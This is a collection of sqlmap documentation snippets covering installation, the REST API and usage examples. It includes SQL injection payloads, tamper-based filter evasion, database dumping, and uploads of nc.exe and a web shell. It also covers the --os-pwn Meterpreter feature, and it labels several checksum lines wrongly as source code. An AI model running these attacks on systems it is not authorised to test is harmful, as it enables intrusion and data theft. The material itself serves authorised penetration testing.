### Get All sqlmap Options Source: https://github.com/sqlmapproject/sqlmap/blob/master/README.md Display a comprehensive list of all available options and switches for sqlmap. Ensure Python is installed. ```bash python sqlmap.py -hh ``` -------------------------------- ### Install and Verify sqlmap Source: https://context7.com/sqlmapproject/sqlmap/llms.txt Clone the repository, navigate to the directory, and verify the installation by checking the version. Python 2.7 or 3.x is required. ```bash git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev cd sqlmap-dev python sqlmap.py --version ``` ```bash python sqlmap.py -h ``` ```bash python sqlmap.py -hh ``` -------------------------------- ### Start SQLMap Scan via API Client Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage Initiates a new SQLMap scan task using the API client. This example demonstrates starting a scan with a specific URL and options, then checking its status. ```bash $ python sqlmapapi.py -c -H "192.168.110.1" [12:47:53] [DEBUG] Example client access from command line: $ taskid=$(curl http://192.168.110.1:8775/task/new 2>1 | grep -o -I '[a-f0-9 ]\\{16\\}') && echo $taskid $ curl -H "Content-Type: application/json" -X POST -d '{"url": "http://testp hp.vulnweb.com/artists.php?artist=1"}' http://192.168.110.1:8775/scan/$taskid/st art $ curl http://192.168.110.1:8775/scan/$taskid/data $ curl http://192.168.110.1:8775/scan/$taskid/log [12:47:53] [INFO] Starting REST-JSON API client to 'http://192.168.110.1:8775'.. . [12:47:53] [DEBUG] Calling http://192.168.110.1:8775 [12:47:53] [INFO] Type 'help' or '?' for list of available commands api> new -u "http://testphp.vulnweb.com/artists.php?artist=1" --banner --flush-s ession [12:48:10] [DEBUG] Calling http://192.168.110.1:8775/task/new [12:48:10] [INFO] New task ID is 'a42ddaef02e976f0' [12:48:10] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/start [12:48:10] [INFO] Scanning started api (a42ddaef02e976f0)> status [12:48:16] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/statu s { "status": "running", "returncode": null, "success": true } api (a42ddaef02e976f0)> status [12:48:50] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/statu s { "status": "terminated", "returncode": 0, "success": true } api (a42ddaef02e976f0)> log ``` -------------------------------- ### Get Basic sqlmap Options Source: https://github.com/sqlmapproject/sqlmap/blob/master/README.md Display a list of basic options and switches for sqlmap. This command requires Python to be installed. ```bash python sqlmap.py -h ``` -------------------------------- ### Run SQLMap with Wizard Interface Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage Use the --wizard flag for an interactive, beginner-friendly setup. This mode guides users through the process with minimal questions, making it easier to configure SQLMap for a run. ```bash $ python sqlmap.py --wizard sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon sible for any misuse or damage caused by this program [*] starting at xx:xx:26 Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_in t.asp?id=1 POST data (--data) [Enter for None]: Injection difficulty (--level/--risk). Please choose: [1] Normal (default) [2] Medium [3] Hard > 1 Enumeration (--banner/--current-user/etc). Please choose: [1] Basic (default) [2] Smart [3] All > 1 sqlmap is running, please wait.. heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL S erver'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y do you want to include all tests for 'Microsoft SQL Server' extending provided l evel (1) and risk (1)? [Y/n] Y GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any )? [y/N] N sqlmap identified the following injection points with a total of 25 HTTP(s) requ ests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 2986=2986 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+C HAR(58)+(SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58 )+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58))) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(118)+CHAR(114)+CHAR(1 00)+CHAR(58)+CHAR(70)+CHAR(79)+CHAR(118)+CHAR(106)+CHAR(87)+CHAR(101)+CHAR(119)+ CHAR(115)+CHAR(114)+CHAR(77)+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=1; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=1 WAITFOR DELAY '0:0:5'-- Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: id=(SELECT CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR (109)+CHAR(113)+CHAR(58)) --- web server operating system: Windows XP web application technology: ASP, Microsoft IIS 5.1 back-end DBMS operating system: Windows XP Service Pack 2 back-end DBMS: Microsoft SQL Server 2005 banner: --- Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2) --- current user: 'sa' current database: 'testdb' current user is DBA: True [*] shutting down at xx:xx:52 ``` -------------------------------- ### Starting a New Scan Task via API Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage Example of starting a new SQLMap scan task using the REST-JSON API. ```APIDOC ## Start New Scan Task (API Example) ### Description This example demonstrates how to start a new SQLMap scan task using `curl` against the REST-JSON API. ### Request 1. Get a new task ID: ```bash taskid=$(curl http://192.168.110.1:8775/task/new 2>1 | grep -o -I '[a-f0-9]\\{16\\}') && echo $taskid ``` 2. Start the scan with specified URL and options: ```bash curl -H "Content-Type: application/json" -X POST -d '{"url": "http://testphp.vulnweb.com/artists.php?artist=1"}' http://192.168.110.1:8775/scan/$taskid/start ``` ### Retrieve Data/Log * To get scan data: ```bash curl http://192.168.110.1:8775/scan/$taskid/data ``` * To get scan log: ```bash curl http://192.168.110.1:8775/scan/$taskid/log ``` * To get scan status: ```bash curl http://192.168.110.1:8775/scan/$taskid/status ``` ``` -------------------------------- ### Use Simple Wizard Interface Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage Launches a simple wizard interface designed to guide beginner users through SQLMap's functionalities. ```bash --wizard ``` -------------------------------- ### Full API workflow example Source: https://context7.com/sqlmapproject/sqlmap/llms.txt This Python script demonstrates a complete sqlmap API workflow: creating a task, starting a scan with specified parameters, polling for status, retrieving results, and deleting the task. It requires the 'requests' and 'time' libraries. ```python import requests import time import json BASE = "http://127.0.0.1:8775" # 1. Create task task = requests.get(f"{BASE}/task/new").json() taskid = task["taskid"] print(f"Task ID: {taskid}") # 2. Start scan payload = { "url": "http://testphp.vulnweb.com/artists.php?artist=1", "batch": True, "level": 1, "risk": 1, "dbs": True, "banner": True } start = requests.post(f"{BASE}/scan/{taskid}/start", json=payload, headers={"Content-Type": "application/json"}).json() print(f"Started: {start}") # 3. Poll until done while True: status = requests.get(f"{BASE}/scan/{taskid}/status").json() print(f"Status: {status['status']}") if status["status"] == "terminated": break time.sleep(5) # 4. Retrieve results data = requests.get(f"{BASE}/scan/{taskid}/data").json() for entry in data.get("data", []): print(f"Type {entry['type']}: {entry['value']}") # 5. Clean up requests.get(f"{BASE}/task/{taskid}/delete") ``` -------------------------------- ### Scan URL with GET Parameters Source: https://context7.com/sqlmapproject/sqlmap/llms.txt Perform a basic scan on a URL with GET parameters, including fingerprinting, banner retrieval, and listing users and databases. Assumes a MySQL backend. ```bash python sqlmap.py -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users ``` -------------------------------- ### Start SQLMap API Server Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage Launches the SQLMap REST-JSON API server. It listens on the specified host and port, ready to accept client connections and manage scan tasks. ```bash $ python sqlmapapi.py -s -H "0.0.0.0" [12:47:51] [INFO] Running REST-JSON API server at '0.0.0.0:8775'.. [12:47:51] [INFO] Admin ID: 89fd118997840a9bd7fc329ab535b881 [12:47:51] [DEBUG] IPC database: /tmp/sqlmapipc-SzBQnd [12:47:51] [DEBUG] REST-JSON API server connected to IPC database [12:47:51] [DEBUG] Using adapter 'wsgiref' to run bottle [12:48:10] [DEBUG] Created new task: 'a42ddaef02e976f0' [12:48:10] [DEBUG] [a42ddaef02e976f0] Started scan [12:48:16] [DEBUG] [a42ddaef02e976f0] Retrieved scan status [12:48:50] [DEBUG] [a42ddaef02e976f0] Retrieved scan status [12:48:55] [DEBUG] [a42ddaef02e976f0] Retrieved scan log messages [12:48:59] [DEBUG] [a42ddaef02e976f0] Retrieved scan data and error messages ``` -------------------------------- ### Dump a Range of Entries with SQLMap Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage Control the range of entries to dump using `--start` and `--stop` options. For example, `--stop 1` dumps the first entry, and `--start 1 --stop 3` dumps the second and third entries. ```bash python sqlmap.py -D database_name -T table_name --dump --stop 1 ``` ```bash python sqlmap.py -D database_name -T table_name --dump --start 1 --stop 3 ``` -------------------------------- ### Install/Upgrade sqlmap via PyPI Source: https://github.com/sqlmapproject/sqlmap/wiki/Download-and-update Install or upgrade sqlmap using pip, the Python package installer. This command ensures you have the latest stable release available on the Python Package Index. ```bash pip install --upgrade sqlmap ``` -------------------------------- ### Check sqlmap Dependencies Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage Use the '--dependencies' switch to verify if all necessary third-party libraries for specific sqlmap features are installed. This is crucial for features like direct DBMS connection or specific authentication types. ```bash $ python sqlmap.py --dependencies [...] [xx:xx:28] [WARNING] sqlmap requires 'python-kinterbasdb' third-party library in order to directly connect to the DBMS Firebird. Download from http://kinterbasd b.sourceforge.net/ [xx:xx:28] [WARNING] sqlmap requires 'python-pymssql' third-party library in ord er to directly connect to the DBMS Sybase. Download from http://pymssql.sourcefo rge.net/ [xx:xx:28] [WARNING] sqlmap requires 'python pymysql' third-party library in ord er to directly connect to the DBMS MySQL. Download from https://github.com/peteh unt/PyMySQL/ [xx:xx:28] [WARNING] sqlmap requires 'python cx_Oracle' third-party library in o rder to directly connect to the DBMS Oracle. Download from http://cx-oracle.sour ceforge.net/ [xx:xx:28] [WARNING] sqlmap requires 'python-psycopg2' third-party library in or der to directly connect to the DBMS PostgreSQL. Download from http://initd.org/p sycopg/ [xx:xx:28] [WARNING] sqlmap requires 'python ibm-db' third-party library in orde r to directly connect to the DBMS IBM DB2. Download from http://code.google.com/ p/ibm-db/ [xx:xx:28] [WARNING] sqlmap requires 'python jaydebeapi & python-jpype' third-pa rty library in order to directly connect to the DBMS HSQLDB. Download from https ://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/ [xx:xx:28] [WARNING] sqlmap requires 'python-pyodbc' third-party library in orde r to directly connect to the DBMS Microsoft Access. Download from http://pyodbc. googlecode.com/ [xx:xx:28] [WARNING] sqlmap requires 'python-pymssql' third-party library in ord er to directly connect to the DBMS Microsoft SQL Server. Download from http://py mssql.sourceforge.net/ [xx:xx:28] [WARNING] sqlmap requires 'python-ntlm' third-party library if you pl an to attack a web application behind NTLM authentication. Download from http:// code.google.com/p/python-ntlm/ [xx:xx:28] [WARNING] sqlmap requires 'websocket-client' third-party library if y ou plan to attack a web application using WebSocket. Download from https://pypi. python.org/pypi/websocket-client/ ``` -------------------------------- ### Dump Database Table Entries with SQLMap Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage Use the `--dump` switch with `-T` to specify the table and optionally `-D` for the database. If the database is not specified, the current database is used. This example targets a Firebird database. ```bash $ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1"\ --dump -T users [...] Database: Firebird_masterdb Table: USERS [4 entries] +----+--------+------------+ | ID | NAME | SURNAME | +----+--------+------------+ | 1 | luther | blisset | | 2 | fluffy | bunny | | 3 | wu | ming | | 4 | NULL | nameisnull | +----+--------+------------+ ``` -------------------------------- ### Configure HTTP Basic Authentication in sqlmap Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage Specify the HTTP authentication type (--auth-type) and credentials (--auth-cred) for target applications. This example uses Basic authentication with a username and password. ```bash $ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id\ =1" --auth-type Basic --auth-cred "testuser:testpass" ``` -------------------------------- ### Count Table Entries with SQLMap Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage Use the --count switch to determine the number of entries in specified tables before dumping data. This example targets a Microsoft SQL Server. ```bash $ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --count -D testdb [...] Database: testdb +----------------+---------+ | Table | Entries | +----------------+---------+ | dbo.users | 4 | | dbo.users_blob | 2 | +----------------+---------+ ``` -------------------------------- ### Execute SQLMap with Tamper Scripts Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage Example of running SQLMap with multiple tamper scripts to bypass weak input validation. It specifies the target URL, tamper scripts, and verbosity level. ```bash $ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --\ tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3 [hh:mm:03] [DEBUG] cleaning up configuration parameters [hh:mm:03] [INFO] loading tamper script 'between' [hh:mm:03] [INFO] loading tamper script 'randomcase' [hh:mm:03] [INFO] loading tamper script 'space2comment' [...] [hh:mm:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [hh:mm:04] [PAYLOAD] 1)/**/And/**/1369=7706/**/And/**/(4092=4092 [hh:mm:04] [PAYLOAD] 1)/**/AND/**/9267=9267/**/AND/**/(4057=4057 [hh:mm:04] [PAYLOAD] 1/**/AnD/**/950=7041 [...] [hh:mm:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [hh:mm:04] [PAYLOAD] 1/**/anD/**/(SELeCt/**/9921/**/fROm(SELeCt/**/counT(*),CONC AT(cHar(58,117,113,107,58),(SELeCt/**/(case/**/whEN/**/(9921=9921)/**/THeN/**/1/ **/elsE/**/0/**/ENd)),cHar(58,106,104,104,58),FLOOR(RanD(0)*2))x/**/fROm/**/info rmation_schema.tables/**/group/**/bY/**/x)a) [hh:mm:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable [...] ``` -------------------------------- ### Establish Out-of-Band Connection with SQLMAP Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage Use this command to establish an out-of-band connection to the database server's operating system, enabling features like Meterpreter sessions. Requires Metasploit Framework to be installed and configured. ```bash python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?\nid=1" --os-pwn --msf-path /software/metasploit ``` -------------------------------- ### Execute sqlmap on Windows Source: https://github.com/sqlmapproject/sqlmap/wiki/FAQ Run this command in a Windows terminal to execute sqlmap and view its basic help message. Replace C:\PythonXX with your Python installation path. ```batch C:\PythonXX\python.exe sqlmap.py -h ``` -------------------------------- ### Set Custom HTTP Headers with sqlmap Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage Use the --headers option to provide multiple custom HTTP headers, separated by newlines, for sqlmap requests. This example demonstrates setting Host and User-agent. ```bash $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" -z \ "ign,flu,bat,tec=E" --headers="Host:www.target.com\nUser-agent:Firefox 1.0" -v 5 [...] [xx:xx:44] [TRAFFIC OUT] HTTP request [#5]: GET /sqlmap/mysql/get_int.php?id=1%20AND%20%28SELECT%209351%20FROM%28SELECT%20C\ OUNT%28%2A%29%2CCONCAT%280x3a6161733a%2C%28SELECT%20%28CASE%20WHEN%20%285473%20\ %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\ 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\ 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\ %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\ 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\ 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\ %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\ 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\ 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\ %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3D%20%20%20%20%20%20%20%\ 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\ 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\ %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\ 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\ 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\ %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\ 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\ 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\ %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\ 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\ 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\ %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%205473%29%20THEN%201%20ELSE%200%20END%29%29%2C\ 0x3a6c666d3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARA\ CTER_SETS%20GROUP%20BY%20x%29a\ 29 HTTP/1.1 Host: www.target.com Accept-encoding: gzip,deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: Firefox 1.0 Connection: close [...] ``` -------------------------------- ### Specify Testable Parameters with -p Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage Use the `-p` option to manually specify a comma-separated list of parameters (GET or POST) that sqlmap should test. This bypasses the default behavior and the dependency on the `--level` option. ```bash python sqlmap.py -u "http://targeturl/param1/value1*/param2/value2/" ``` -------------------------------- ### Read File from Database Server with SQLMap Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage Retrieve file content from the database server's file system using the `--file-read` option. This is supported for MySQL, PostgreSQL, and Microsoft SQL Server, provided the session user has sufficient privileges. The example demonstrates reading a binary file from a Microsoft SQL Server 2005 target. ```bash python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" --file-read "C:/example.exe" -v 1 ``` ```bash ls -l output/192.168.136.129/files/C__example.exe ``` ```bash file output/192.168.136.129/files/C__example.exe ``` -------------------------------- ### SQLMap API Server Help Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage Displays the available options for running the SQLMap API server. Use this to understand command-line arguments for server configuration. ```bash $ python sqlmapapi.py -hh Usage: sqlmapapi.py [options] Options: -h, --help show this help message and exit -s, --server Act as a REST-JSON API server -c, --client Act as a REST-JSON API client -H HOST, --host=HOST Host of the REST-JSON API server (default "127.0.0.1") -p PORT, --port=PORT Port of the the REST-JSON API server (default 8775) --adapter=ADAPTER Server (bottle) adapter to use (default "wsgiref") ``` -------------------------------- ### SQLMap Project Initialization Files Source: https://github.com/sqlmapproject/sqlmap/blob/master/data/txt/sha256sums.txt These are Python __init__.py files, typically used to mark directories as Python packages. They are present in various utility subdirectories. ```python 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/__init__.py ``` -------------------------------- ### List All Databases with SQLMap Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage Use the `--dbs` switch to enumerate a list of all available databases. This requires the session user to have read access to the system table containing database information. ```bash sqlmap -u "http://example.com/page?id=1" --dbs ``` -------------------------------- ### SQLMap UNION Query Payload Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage A UNION query payload example for SQLMap, typically used when the application returns the results of a SELECT statement directly in the HTTP response. This example targets a 3-column NULL scenario. ```sql artist=-7983 UNION ALL SELECT CONCAT(0x716b706271,0x6f6c506a747376426d58446f634454616a4c647a6c6a69566e584e454c64666f6861466e697a5069,0x716a786a71),NULL,NULL-- - ``` -------------------------------- ### API Task Status Response Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage Example response structure for retrieving the status of a scan task. ```APIDOC ## API Task Status Response ### Description This shows the typical JSON response when querying the status of a scan task via the API. ### Response Example (Success) ```json { "status": "running", "returncode": null, "success": true } ``` ### Response Example (Terminated) ```json { "status": "terminated", "returncode": 0, "success": true } ``` ``` -------------------------------- ### Upload File to Database Server with SQLMap Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage Use `--file-write` and `--file-dest` to upload a local file to the database server's file system. This is applicable for MySQL, PostgreSQL, and Microsoft SQL Server when the user has sufficient privileges. The file can be textual or binary. ```bash $ file /software/nc.exe.packed /software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32 -bit $ ls -l /software/nc.exe.packed -rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed $ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write "/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1 [...] [hh:mm:29] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2003 or 2008 web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: MySQL >= 5.0.0 [...] do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been success fully written on the back-end DBMS file system? [Y/n] y [hh:mm:52] [INFO] retrieved: 31744 [hh:mm:52] [INFO] the file has been successfully written and its size is 31744 b ytes, same size as the local file '/software/nc.exe.packed' ``` -------------------------------- ### C++ Source Code for Runcmd Precompiled Header (H) Source: https://github.com/sqlmapproject/sqlmap/blob/master/data/txt/sha256sums.txt This C++ header file is part of the precompiled header setup for the 'runcmd' utility. ```cpp e278d40d3121d757c2e1b8cc8192397e5014f663fbf6d80dd1118443d4fc9442 extra/runcmd/src/runcmd/stdafx.h ``` -------------------------------- ### Interactive SQLMap Shell Commands Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage Demonstrates interactive commands within the SQLMap shell, including setting the target URL, requesting the banner, and exiting the shell. This is useful for live testing and exploration. ```bash sqlmap-shell> -u "http://testphp.vulnweb.com/artists.php?artist=1" --banner ``` ```bash sqlmap-shell> exit ``` -------------------------------- ### C++ Source Code for Runcmd Precompiled Header (CPP) Source: https://github.com/sqlmapproject/sqlmap/blob/master/data/txt/sha256sums.txt This C++ source file is part of the precompiled header setup for the 'runcmd' utility. ```cpp d4186cac6e736bdfe64db63aa00395a862b5fe5c78340870f0c79cae05a79e7d extra/runcmd/src/runcmd/stdafx.cpp ``` -------------------------------- ### Upload Files to Server with SQLMap Source: https://context7.com/sqlmapproject/sqlmap/llms.txt Uploads a local file to the database server's file system, useful for deploying web shells. ```bash python sqlmap.py -u "http://192.168.1.129/vuln.aspx?id=1" \ --file-write "/local/path/shell.php" \ --file-dest "C:/inetpub/wwwroot/uploads/shell.php" -v 1 ``` -------------------------------- ### SQLMap Boolean-Based Blind Payload Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage An example of a boolean-based blind SQL injection payload used by SQLMap. This type of injection relies on observing true/false responses from the database. ```sql artist=1 AND 5707=5707 ```